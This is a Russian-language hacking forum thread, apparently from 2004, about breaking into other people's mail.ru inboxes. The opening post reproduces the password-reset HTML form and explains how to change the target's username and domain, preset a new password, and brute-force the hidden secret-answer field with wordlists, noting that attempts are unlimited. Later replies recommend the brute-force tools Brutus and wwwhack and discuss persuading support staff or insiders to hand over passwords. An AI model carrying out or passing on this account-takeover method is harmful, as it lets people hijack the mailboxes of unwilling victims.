1. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Думаю каждый хотя бы раз пытался ответить на секретный вопрос для чужого ящика) Что мне всегда мешало, так это надобность вводить дату рождения. Но есть однако одна небольшая недоработка программистов) Жмем "забыли пароль", вводим свой адрес, потом день рождения, и ответ на секретный вопрос(к примеру VZLOM и переходим к новой странице. Если все верно, то можно менять пароль. Вот тут самое время просмотреть HTML-код)) приблизительно такой.
    <form action=http://mail.ru/cgi-bin/passremind>
    <input type=hidden name=username value=yourmail>
    <input type=hidden name=action value=change>
    <input type=hidden name=domain value=inbox.ru>
    <input type=hidden name=answer value=VZLOM>
    <input type=password name=pass1>
    <input type=password name=pass2>
    <input type=submit>
    </form>

    Как видно, теперь даты рождения и в помине нет, а ответ на вопрос передается в скрытом поле. Меняем мыло и домен на нужные, задаем заранее значения пароля, и брутфорсим переменную answer, когда ответ будет правильным - пароль сразу сментится на заданный.
    Для программ можно использовать заранее составленные вручную словари, например для собачек: Граф, тузик
    для машин: Вольво, Линкольн))
    Ну и на край, просто метод перебора, ведь некоторые не вводят правильный ответ, а просчто набор случайных символов.
    Что хорошо в этом способе, лимита попыток нет, да и подобрать легче чем пароль.
     
  2. KAMA3

    KAMA3 New Member

    Joined:
    10 Jul 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ништяк идея[​IMG]
     
  3. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Jazzz, я где-то читал про это ...
     
  4. KAMA3

    KAMA3 New Member

    Joined:
    10 Jul 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Надо прогу написать
     
  5. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Какую еще прогу ?  [​IMG]
     
  6. KAMA3

    KAMA3 New Member

    Joined:
    10 Jul 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    которая будет ответы подбирать(надеюсь я не говорю щас глупость)
     
  7. Николь

    Николь New Member

    Joined:
    19 Dec 2003
    Messages:
    49
    Likes Received:
    0
    Reputations:
    0
    Я недавно получила на мейле пароль к своему ящику...даже не зная ответа на секрет. вопрос...так выслали...главное, было хорошо попросить...)
     
  8. Пересмешник

    Joined:
    15 Jul 2004
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Леди, а можно поподробнее?
     
  9. KAMA3

    KAMA3 New Member

    Joined:
    10 Jul 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    JazzzSummerMan зацени ка это: http://www.securitylab.ru/46496.html . Ты как гуру взломов бесплатных почтовиков должен знать что с этим делать!
     
  10. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Прикольно  [​IMG]
     
  11. KAMA3

    KAMA3 New Member

    Joined:
    10 Jul 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    блин, дело в том что я в яве не силен[​IMG] объясните плз как что и как я могу сделать с помошью этой уязвимости
     
  12. Guest

    Guest Guest

    Reputations:
    0
    насчет секьюритилаб рахзумеецца, смешно опять же... как только туда такое попало.. Камаз, чтоб брутфорсить хтмл-формы рекомендую BRUTUS, прогу.. ну или wwwhack  в крайнем
     
  13. Guest

    Guest Guest

    Reputations:
    0
    николь, солнце, ты получила к своему ящику пароль, ну ведь у тебя и айпишник был того же прова, который нужен...
     
  14. Николь

    Николь New Member

    Joined:
    19 Dec 2003
    Messages:
    49
    Likes Received:
    0
    Reputations:
    0
    -JazzzSummerMan- ...Дело не в этом...они очень сильно сопротивлялись...Более 10 писем мы написали друг  другу, где я их  просто убеждала, что это мой ящик, и он мне очень нужен, дорог, ценен...И они выслали пароль...без всяких  вопросов секретных...А я совершила очень много попыток ответить на него...Вероятно...просто повезло и попались добрые люди))
     
  15. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Гы, женское обояние ...  [​IMG]
     
  16. extra™

    extra™ New Member

    Joined:
    4 Jul 2004
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Или просто надо знать тех кто там когдато работал  [​IMG]
     
  17. Че Гевара

    Че Гевара Elder - Старейшина

    Joined:
    5 Oct 2003
    Messages:
    1,049
    Likes Received:
    29
    Reputations:
    8
    Ага ... Или все еще работает [​IMG]
     
  18. extra™

    extra™ New Member

    Joined:
    4 Jul 2004
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Информация великая СИЛА [​IMG]
     
  19. SiloS

    SiloS Banned

    Joined:
    8 Aug 2004
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    [​IMG] мило
     
  20. -=FeliX][ax0r=-

    -=FeliX][ax0r=- New Member

    Joined:
    31 Jul 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    А как сделать так чтобы пароль перебирался автоматически, а не вводить какждый раз самому